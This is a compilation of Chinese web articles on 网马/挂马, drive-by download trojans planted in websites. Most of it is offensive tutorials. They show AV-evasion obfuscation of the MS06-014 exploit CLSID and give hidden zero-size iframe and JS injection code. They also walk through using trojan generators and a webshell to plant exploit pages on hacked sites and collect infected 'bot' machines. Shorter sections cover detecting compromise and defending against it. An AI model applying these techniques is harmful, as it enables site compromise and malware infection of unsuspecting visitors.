什么是网马,怎么制作网马,怎么挂马
网马免杀原理
一:首先认识网络上的各版本网马首先认识MS-06014 MS-06040 MS-06042那么,网络上的大部分最新的网马生成器,也就是利用这些漏洞来制作网马的其实,网马他很简单,我们从原理来学习他。
别看网络上的网马生成器,非常的多,其实,都是一个模式出来的。
就像QQ木马一样,都是一个源代码弄出来的二:认识网马代码那么,8月份的MS-06014漏洞现在网络上的大部分稳定的网马生成器,也就是延用这个漏洞。
他的网马生成器所生成的原装网马代码的是最早的占有者等。
这里,我们查看MS06014 中华网络所生成的网马这个就是原装的代码,那么,我们通过比对,就能知道,网络上的这些个天花乱坠的网马生成器原形三:通过对比,我们来学习,如何来制作免杀的网马首先,我们查看和对比,最新的免杀网马所生成的网马与原装代码不同之处通过学习,了解,这些其貌不一的网马到底是如何各自不同的制作各自的免杀(我们主要学习,最新的MS-06014网马,因为现在网络上大部分稳定的网马生成器都是由他变异而来)四:举列子首先,我们查看MS-06014 代码中可以用来制作免杀的变量"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36""object""classid""Microsoft.XMLHTTP""GET""s cripting.FileSystemObject""Shell.Application"首先,我们拿"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 举列然后到,免杀网马中,找到经过免杀处理后的这一句,我们就能知道,大家是如何通过变形这句代码达到免杀的列一:蓝防收费版变异代码j1="clsid:"j2="BD96C556-"j3="65A3-"j4="11D0-"j5="983A-"j6="00C04FC29E36"j7=j1&j2&j3&j4&j5&j6然后在网马代码中的"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 里面的clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 替换成j7也就是"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"="j7"具体我们可以查看最新的蓝防免杀网马列二:老丁内部网马变异代码U1="c"Bs="l"Bg="s"UN="i"Io="d"Ul=":"Y3="BD"Os="96"I2="C5"I8="56-"J3="65"ob="A3-"P4="11"sy="D0-"Q5="98"U0="3A-"E6="00C"Ug="04F"Xn="C29"Ij="E36"M7=u1&Bs&Bg&un&io&ul&Y3&Os&i2&i8&j3&ob&p4&sy&q5&u0&e6&Ug&xn&Ij变异的无所谓不短哈~还是一样,经过这样变异后"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"="j7"列三:NCPH变异代码c1 ="clsid:BD"c2="96C556-65A3-11"c3="D0-983A-00C04F"c4="C29E36"大家看到这句,HOHO~他并没有在尾部升明a1=b1&b2....这样的形式,他的变异是缺少了吗?其实他不升明,只需要在原装代码中的"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"替换成"c1+c2+c3+c4"--------------------------------------------------------------------------------------------------------------------------------------二实践操作变异"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"拥有属于自己的个性免杀如果你仔细的看了上面的列子,结合你的思考,通过你的学习你应该懂得呢,如何去变异这些代码,如果我们学会,以后不管什么漏洞,不管什么代码,原理掌握了,我们顺手就能免杀那么我呢,就举列变异一次弄个简单的,@-@首先在代码中升明,恩,告诉系统,我们已经把某某代码,替换成某某代码了,别读写错误拉`也就是"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"zhonghua1="clsid"zhonghua2="BD96C556"zhonghua3="-65A3"zhonghua4="-11D0"zhonghua5="-983A"zhonghua6="-"zhonghua7="00C04FC29E36"zhonghuahk1=zhonghua1&zhonghua2&zhonghua3&zhonghua4&zhonghua5&zhonghua6&zhong hua7貌似分离爱猫扑.爱生活,~-~HOHO,把机器人的手脚分开,等你检查我不是机器人后,偶再组合起来好拉,不多举列拉,再举教程就太大拉~-`三:生成属于自己的免杀网马这里,我们来招卑鄙的在别人网马变异过后的基础上,我替换掉一句,然后,生成~HOHO~~这样,完美的属于自己的网马就不小心弄好拉~这里我们使用蓝防收费版免杀网马使用MS-06014漏洞变异网马(这网马人家可是说提高中率百分之五十哦,不用白不用)然后用zhonghua1="clsid"zhonghua2="BD96C556"zhonghua3="-65A3"zhonghua4="-11D0"zhonghua5="-983A"zhonghua6="-"zhonghua7="00C04FC29E36"zhonghuahk1=zhonghua1&zhonghua2&zhonghua3&zhonghua4&zhonghua5&zhonghua6&zhong hua7替换掉m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"接着在将下面的M3换成zhonghuahk1(@-@:可以悄悄的说,知道了原理,免杀还真是简单)然后确定,唉呀呀~~弄成拉~那么希望大家参照上面的变异,别学我偷懒,弄他个超级无敌变异免杀网马出来~。
课件:注入和网页挂马
• 一:框架挂马 • <iframe src=地址 width=0 height=0></iframe> • 二:js文件挂马 • 首先将以下代码 • document.write("<iframe width='0' height='0' src='地址'></iframe>"); • 保存为xxx.js, • 则JS挂马代码为 • <script language=javascript src=xxx.js></script> • 三:js变形加密 • <SCRIPT language="JScript.Encode" src=/muma.txt></script> • muma.txt可改成任意后缀
• 2.3 网页挂马演示举例
• 2.3.1 图片伪装演示 • <html> • 1 <iframe src="欺骗网页.html" height=0 width=0></iframe> • 2 <img src="m12.jpg" /> • </html> • 2处:正常的网页内容 • 1处:在iframe标签中,我们嵌入了一个欺骗网页,这个网页
• 八:图片伪装
• <html> • <iframe src="网马地址" height=0 width=0></iframe> • <img src="图片地址"></img>
• </html> • 九:伪装调用:
如何查看网站挂马
终极网站挂马检测工具(网站被挂马怎么办)之前做一些淘客站,一些小站,也都没有在意过检查网站挂马!总觉得应该没有人会给我的网站挂马,现在做了一些正规站,一些商城,所有的东西都要考虑了。
一不小心网站被挂马,我那些数据可就麻烦大了啊,还有网站的排名恐怕也难保了。
所以今天就收集了一些资料,全部整理了一下,然后给自己的网站都运用上了。
具体网站被挂马怎么办大家可以看我下面的介绍!一,网站被挂马有什么危害?1,网站被搜索引擎(google,百度等)屏蔽,影响SEO流量。
2,网站被杀软查杀或屏蔽。
3,网站成为木马散布点。
4,严重危害用户各种账号安全,影响自身公众信誉度。
5,网站的数据受到影响。
6,网站本身操作SEO的话,会对网站权重受到影响。
二,网站被挂马在搜索引擎和浏览器中被拦截的情况:百度搜索后网站被挂马情况:谷歌搜索后网站被挂马情况360浏览器网站挂马检测情况火狐浏览器网站挂马检测情况Googel浏览器网站挂马检测情况三,如何判断网站被挂马,网站被攻击?如果检查你的网站时候存在下列问题,则说明你的网站可能已经被黑客攻击:1、通过Site语法查询站点,显示搜索引擎收录了大量非本站应有的页面。
2、从百度搜索结果中点击站点的页面,跳转到了其他站点。
3、站点内容在搜索结果中被提示存在风险。
4、从搜索引擎带来的流量短时间内异常暴增。
注:site查询结合一些常见的色情、游戏、境外博彩类关键字,可帮助站长更快的找到异常页面,例如“site: 博彩”一旦发现上述异常,我们建议您立即对网站进行排查。
包括:1、分析系统和服务器日志,检查自己站点的页面数量、用户访问流量等是否有异常波动,是否存在异常访问或操作日志;2、检查网站文件是否有不正常的修改,尤其是首页等重点页面;3、网站页面是否引用了未知站点的资源(图片、JS等),是否被放置了异常链接;4、检查网站是否有不正常增加的文件或目录;5、检查网站目录中是否有非管理员打包的网站源码、未知txt文件等。
网站挂马
挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。
挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL,比如下面的挂马代码:<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。
<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。
通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。
除了这两种常见的挂马方式外,还有如下几种:1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。
2、利用网页跳转、弹出新窗口等方式进行挂马。
3、利用Flash等媒体封装的方式进行挂马。
4、在CSS(层叠样式表)里可以执行JavaScript的浏览器中进行挂马。
挂马常见类型常见的几种类型如下:1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中,如果网站页面使用到这些字段的值,并且没做适当的过滤,就有可能导致用户访问该网站的页面时执行攻击者注入的代码。
2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。
3、ARP挂马在与目标站点同一局域网的情况下,攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗,并将挂马代码注入到用户请求的响应页面上,从而达到隐蔽的挂马目的。
网页挂马详细步骤教程
∙∙当前位置 : 主页 > 网络安全 > 黑客教程 >网页挂马详细步骤教程来源:互联网作者:佚名时间:04-30 13:19:33【大中小】点评:其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。
下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中:其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。
下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中:<iframe src="这里换成你的网马的地址" width="0" height="0"frameborder="0"></iframe>我来插入,理论上来说插到任何地方都行,只是不要把html语言给弄乱了就行本来没有插进去的页面就是这样,不知道网易那里有没有弹出的广告了,好我们运行,注意到网页的左下角的网址变化看到左下角了吧,那里在请求,说明我们插入进去的页面也运行了,哦,还有个弹出的窗口,给我的工具拦了,我来刷新一次,看到吧width="0" height="0" frameborder="0"就是大小高度的意思,我们把他设置为零,那我们就不能看到网页的内容了看下一种方法,把原来插进去的清理掉先,等下那个文件还要用方法二:这个就是脚本<SCRIPT language=javascript>window.open("/test.htm","","toolbar=no,location=no,directorie s=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>我们做网页的时候就会加入很多网页特效,同样我们也可以用来打开我们的网马,那么浏览过机子就会中我们的网马了~学过java的都知道上面一段代码的意思了把!打开网站的同时也就打开了我们的/test.htm看我们插进去弹出的窗口给拦了,我去掉先,还是给拦了晕,有个窗口弹了出来,这样子的网马是不保险的……不过也不失为一种方法呃~改成0就更大的窗口了,好,方法而已,只是介绍,下一个方法三:还有一点就是比较隐蔽的那就是使用js文件document.write("<iframe width='0' height='0'src='/mm1.htm'></iframe>");document.write("<iframe width='0' height='0'src='/mm2.htm'></iframe>");我们没必要挂两个网马,就写一个好了额刚才写错位置了保存为mm.js,然后在首页里调用js脚本<script language="javascript" src="</script'>/mm.js"></script>这个就是调用的代码,从这里我们可以看到/mm.js,说明我们的mm.js 文件可以不传到主机上,这样可以方便我们批量管理我们挂马,传到我们的主页空间上就可以了不过我这里就不传了,就用本地的吧,运行左下角……调用了163的了,再刷新下,看清楚点,OK下一种方法方法五:再一种代码就是调用其他网页的页面文件,可以将下面的代码复制,保存为HTM文件。
网页挂马手段全解析
---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一,在 2008 年到2010 年间,网页挂马攻击更是成为了黑客最主要的攻击手段。
根据瑞星云安全系统监测, 2008 年到 2010 年间,客户端受到恶意网马的年攻击次数达到千万级别。
虽然近两年来,网络钓鱼攻击已经在数量上超越了网页挂马攻击,但是网页挂马攻击所带来的危害依然巨大,不仅对网站的安全运行造成威胁,对客户端用户来说,网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。
常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后,在网站的页面中插入一些代码,当浏览者访问到这些包含有恶意代码的网页时,就会在不知不觉中执行相应的漏洞利用程序。
这些程序可以在浏览者的电脑上下载并执行木马程序,导致浏览者的电脑成为黑客的肉鸡。
挂马操作可以有多种方式实现,以下是比较常见的几种挂马攻击手段。
1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架,在访问网页时,从网页表面是无法通过肉眼看到这个框架的,只能通过网页源码分析或抓包的方式查看到相应的数据信息。
1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中,同时恶意篡改网站文件中的 JS 文件代。
一般来讲,那些被全站引用的 JS 代码最容易被黑客挂马。
3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理,黑客通过加密代码的方式隐藏了该信息。
4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的,当用户访问挂有以上代码的网页时,页面就会自动跳转去执行黑客指定的恶意页面,从而导致挂在恶意页面的木马在本地被执行。
网页挂马的流程
网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件,如果网站存在SQL注入漏洞,则比较容易取得一定的权限。
如果在服务器上对网站目录等做了较严格的权限限制,也是比较容易取得Webshell权限,具有Webshell权限可以对网页文件进行修改,而挂马就是在网页中加入一些代码。
这些代码往往是利用浏览器或者应用程序的漏洞,浏览者在访问这些网页时,往往会在不知不觉中去下载一些木马程序来执行。
网站挂马的原理就是设置框架网页的宽度和高度为0,将一些恶意网页隐藏起来,用户访问网站时不容易觉察。
目前在网络上有很多网页木马生成器,简称“网马生成器”,本案例以“Ms-0733网马生成器”为例,来讲解如何进行网站挂马攻击。
步骤一配置网页木马。
在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端,然后直接运行“Ms-0933网马生成器”在网马地址中输入“/test.exe”,如图1所示,然后单击“生成木马”即可生成一网页文件HACKLL.HTM。
配置Ms-0733网马生成器步骤二修改网站网页文件。
在网站首页文件index.asp中加入已经配置好的网页木马htm文件,一般通过在页面中加入“”来实现,如图2所示。
加入木马代码到正常网页网页木马利用的是IE浏览器存在的漏洞,其网页木马最本质的东西有两个一个是脚本,另外一个是真正的木马服务端,利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。
其网页木马文件中多是一些JavaScript代码,如图3所示。
网页木马源代码测试网页木马是否能够正常执行。
在未安装微软的MS0933补丁程序的虚拟机中打开浏览器,并在其中输入网页木马的地址,一会儿后,在控制端就看见肉鸡上线了。
大量传播网页木马。
网页木马测试成功以后,就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上,只要访问者的系统未安装其网页木马利用的漏洞,如果系统未安装任何对网页木马进行防御的软件,则计算机感染网页木马的几率非常大。
网页挂马及其防御
网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上,“网页挂马”是一个出现频率很高的词汇。
关于某些网站被挂马导致大量浏览用户受到攻击,甚至造成财产损失的新闻屡见不鲜。
而这些挂马事件总能和一些软件漏洞联系起来。
那么,什么是网页挂马?网页挂马和软件漏洞有什么联系?它的危害在什么地方,又该如何防御呢?本文结合攻防研究中的经验体会,将就这些问题进行探讨。
网页挂马简介什么是网页挂马要解释什么是网页挂马,要先从木马说起。
大家知道,木马是一类恶意程序,和其它的正常文件一样存在于计算机系统中。
这些恶意程序一旦运行,会连接到远处的控制端,使其享有恶意程序所在系统的大部分操作权限,例如给计算机增删密码,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等各种有害操作,而这些操作往往不被使用者察觉。
将木马与网页结合起来成为网页木马,表面看似正常的网页,当浏览者浏览该网页的同时也运行了木马程序。
网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞,自动下载已经放置在远端的恶意程序。
由于下载过程利用了软件上的漏洞,是非正常途径,不会被计算机系统或浏览器本身所察觉。
网页挂马指的是攻击者篡改了正常的网页,向网页中插入一段代码,当用户浏览网页的同时执行这段代码,将引导用户去浏览放置好的网页木马。
使用一些特别的技术可以使得这段代码的执行对用户来说不可见。
网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞,只要这些漏洞能够被利用并执行任意代码,那么存在漏洞的系统就有可能受到网页木马攻击。
网页挂马的技术门槛并不高,互联网上可以得到很多现成的攻击工具。
同时网页木马隐蔽性高,挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行,用户都无法察觉。
网页挂马的传播范围同被挂马网页的数量和浏览量成正比。
各种类型的网站都可以成为网页挂马的对象。
上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
首先说什么是网马。
网马有什么用呢?先说下有什么用。
例如,大家想玩鸽子,想找肉鸡。
想找很多很多的肉鸡。
当然方法很多,例如135抓鸡什么的。
但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串 ...首先说什么是网马。
网马有什么用呢?先说下有什么用。
例如,大家想玩鸽子,想找肉鸡。
想找很多很多的肉鸡。
当然方法很多,例如135抓鸡什么的。
但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串一串的。
我自己操作为啥老半天就扫不到呢?因为这漏洞出来很久了,再者,天天有人扫肉鸡。
当然肉鸡就少了,也很难找到。
还有,大家扫描肉鸡的方法可能也有点不对。
综合起来,利用这些漏洞找肉鸡的效率很低下。
那么用网马呢,网马就是挂马。
你想下。
要是一个网站,一天有1万个人访问,一万个人中哪怕几率降低到%1的中马率。
一天也有100个人中马成为你的肉鸡啊。
而且,你挂上网马后关机睡觉肉鸡也刷刷刷的上来。
所以网马很爽,所以也比自己拿个软件扫描漏洞来劲。
上面说了网马的作用。
综合叙述下,就是快捷,方便。
更快,更高,更强的达到散播木马的途径。
然后,大家应该明什么是网马了吧?对的,网马简单的说下,就是网页木马。
当别人访问一个网页就可能从这个网页自动下载木马,并且在你后台悄悄运行。
这就是网马。
简单的这么理解,当然我们学黑客知识的肯定对这些东西不能简单理解了事了。
但是,我们只是入门的小菜鸟,所以再深入了解一点点就行了。
深入说下。
什么是网马?网马就是利用网页代码操作win的漏洞。
首先,我们得明白什么是网页。
为什么我们打开一个网站,这个网站会显示出这些图片。
就如你现在看的这篇帖子,为什么背景是这个颜色,为什么字体有大有小,为什么网页各处的颜色不同。
然后构成了这样一个网页。
怎么构成的?难道就是简简单单的几张图片就构成了我们现在看到的这个网页页面?错了。
是图片+文字+代码。
这是一个网页构成的基本元素。
但是,代码是必须要的。
这里提到了代码。
例如一段网页由设计者设计,图片应该放这里,文字应该按照这样排列。
这些设计,规划,就是代码来操作的。
当设计者把网页代码编写好了。
然后放在服务器上(一般来说是IIS服务器.IIS简单的说下,就是网页服务器.)进行服务器的解析。
然后当你访问这个网站。
那么就得到了你现在所看到的网页了。
这里提到了代码。
是的。
不光服务器要分析代码。
你的电脑也要解析分析代码。
你的电脑分析了代码才能显示出这样的页面。
所以大家可以在网页空白处,右键单击查看源文件就会看到代码了。
当然,这个只是你单方面的代码,核心代码还是在服务器上。
你这样看到的只是显示的页面解析的静态的页面代码。
也就是说是HTM的代码。
所以,你在浏览器上点,文件---另存为保存网页的时候都是HTM 格式!上面说到了代码。
下面说下漏洞。
WIN这个操作系统有很多漏洞。
我相信大家都知道,清楚。
例如:MS06-04O这样的ms开头的漏洞名字。
这些漏洞是怎么形成的呢。
就是代码操作形成的。
有些朋友就问了,代码怎么会出现漏洞呢。
一时半会讲不清楚。
举例吧,简单通俗的例子。
例如x=取文本 y=取X前三个数字这么一段代码。
如果实际操作的时候,这个文本如果取出来时1234567 那么X就等于1234567 那么Y取的是X文本前三个数字那么Y就等于123.这么一段代码看是没问题。
但是如果取不到文本呢.或者取到的文本数字就1个呢?比如X=1 就一个数字。
那么Y怎么取出前三个数字呢?遇到特殊情况,那么就有可能造成代码出错。
当然,我这里是举例,为了大家简单,就用最最最通俗的例子给大家举例。
具体代码不可能这么乱七八糟的。
如果我们这段代码加个判断。
如果X取到的数字小于3.那么Y就不取前三个数字,或者Y就等于0。
那么是不是什么事情都没了呢?但是,程序员一不小心,没注意,或者没看到这个代码的弊端。
那么就有可能造成代码出错。
造成了漏洞。
以小画大,那么WIN的操作漏洞大多数也是类似的。
由于程序代码的问题。
被黑客发现了。
那么就利用这段代码的漏洞,构造成别有用心的代码造成对电脑的破坏。
当然,不局限于WIN系统。
也可以是例如迅雷,暴风影音照样的第三方软件!口水很多。
也不知道大家听懂了没有。
我们来结合下。
上面说到了访问网页其实就是根据网页,然后本地执行代码。
然后显示在我们的电脑网页上面。
WIN的漏洞就是代码漏洞。
黑客编造一段利用这个代码的漏洞可以进行入侵。
聪明的朋友应该想到了。
访问网页要执行一些代码,win的漏洞要被利用需要执行一些特殊代码!所以。
网马就是构造一段特殊的代码,当你电脑访问了执行了这段代码,正好你的电脑上有被这段代码利用的漏洞。
那么!恭喜你,你就中网马了。
网马就是这样形成的。
所以,有些黑客很牛B的说。
我就算是把我的管理员账号密码告诉你。
你也入侵不了我的电脑。
就如,你把你的网马发给我。
我访问了。
我照样没事。
为啥,我电脑没漏洞,你怎么利用!呵呵,我想大家能理解了吧。
当然,我们小菜鸟深入到这步了解就差不多了。
如何找漏洞。
如何找到漏洞构造此漏洞的代码编写。
这就是黑客们的事情了。
我们还没这个能力。
下面说下网马制作。
上文提到了。
网马就是一段网页代码。
当然,我们不懂这些代码如何编写。
我们还是用别人的工具吧。
网上也有很多网马生成工具。
我随便找了一款。
大家也可以自行去网上搜索寻找。
首先,我们打开软件,我们可以看到。
上面有很多ms这样开头选项。
这就是WIN的系统漏洞利用。
当然我们看到了有暴风,联众,等这样的。
这就是第三方软件漏洞的利用了。
这里,注意上面有个下载地址。
什么是下载地址呢。
就是我们木马的下载地址。
我们把木马上传到网站上。
然后获取到木马的下载地址。
当然了。
别人直接访问你的这个下载地址。
系统会提示你是否下载的提示不说,别人不运行。
木马就运行不了。
所以这里要结合上网页代码。
构造成一个网马。
我本地做实验。
就不上传木马了。
假如,它上面填写的就是我的木马下载地址吧。
我点ms9002。
看到了吗?都是代码。
网页代码!092.htm的代码意思是运行同目录下的ms09002.js。
ms09002.js的大概意思是。
利用ms09002的漏洞,自动下载我们上面指定的那个网址的木马后,自动运行。
当然ms09002的代码是加密了的。
我们也看不大实在!那么这两个文件就是我们的网马文件了。
我们只需要把这两个文件上传到我们网站上。
别人访问了这个网页,如果有ms09002这个漏洞,就可能中马!我们来上传吧。
我用我的一个webshell给大家演示下吧。
网马我就上传到我的webshell目录下!网马生成器,生成了两个文件,就上传两个。
生成了一个,就上传一个。
!那么我们的网马地址在哪儿呢?我们的上传地址是:C:\inetpub\wwwroot\EasySite\Portals\95\cpzs\ 这个目录下。
那么我们要访问的目录地址就是EasySite\Portals\95\cpzs\ +网马名字我们网马是由092.htm调用运行同目录下的ms09002.js那么网马名字就是092.htm。
那么访问地址就是http://www.******.com/EasySite/Portals/95/cpzs/092.htm到此。
我们的网马就做好了。
我们的ms09002漏洞网马地址就是http://www.******.com/EasySite/Portals/95/cpzs/092.htm 发给有此漏洞的朋友。
如果他们电脑没网马拦截软件,或者没其他防御手段。
那么极有可能中马!这里又说下。
构成网马的代码很多种。
当然,网上免费的,分两种。
一种是黑客炫耀技术,故意放出来的。
第二种,商业黑客,写的免费的给大家试用。
对于这样公布了的网马生成器。
有几个坏处。
第一,中马效率低下。
意思是说,有可能别人访问了你的网站根本不会中马。
第二,容易被杀毒软件拦截。
这个大家都清楚吧!第三,容易当别人的工具。
可能免费的。
里面的代码加入了工具制作者的网马。
你挂上了网马,别人种了你的网马,也可能中了此工具制作者的网马!这就是导致很多朋友做的网马失效的原因!所以,对于网马生成器。
大家可以耐心的去网上找找。
肯定会找到一个中马率高,免杀的免费的。
只不过需要花费大量的时间和精力去搜索然后测试。
当然,有经济的朋友可以购买商业黑客的网马生成器。
一般来说很不错的。
如果购买请注意网络骗子!上面几大段谈了什么是网马用途,什么是网马,如何制作网马。
下面我说说怎么挂马吧!挂马什么意思?出现这个概念的时候是基于网马之上的。
我网马做出来了。
不可能每个群,每个人去宣传我的网马地址吧。
现在的人也聪明。
一般的网址不点的。
所以这里要用到挂马了。
把这个网址附加到正常的网页上。
当网友访问了正常的网页,也就不知不觉的中了你的网马了。
用到的代码:<iframe src="你的网马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>这句代码一般加在网页的末尾。
例如我入侵了一个网站。
我要在他的网站上挂马。
例如在http://****/EasySite/Portals/95/cpzs/image.asp这个页面上挂马。
那么,我们进入webshell找到image.asp这个页面。
把:<iframe src="你的网马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>这代码加入进去。
上面网马做好了。
那么就加入:<iframe src="http://www.******.com/EasySite/Portals/95/cpzs/092.htm" name="lcx" width="0" height="0" frameborder="0"></iframe>保存后。
那么我们挂马就成功了。
那么别人一访问http://****/EasySite/Portals/95/cpzs/image.asp这个正常页面。
那么就会不知不觉也访问了你的网马网页,就会中了你的网马了。
当然。
如果你要挂在首页就在首页的文件里面加入代码。
你如果要在整个网站的每个页面都挂马。
那么每个页面都可以加入此代码。
这就是挂马今天说了这么多。
图文并举。
希望大家能从此明白,什么是网马,怎么制作网马,怎么挂马!大家如果有不明白的欢迎在下面提问!。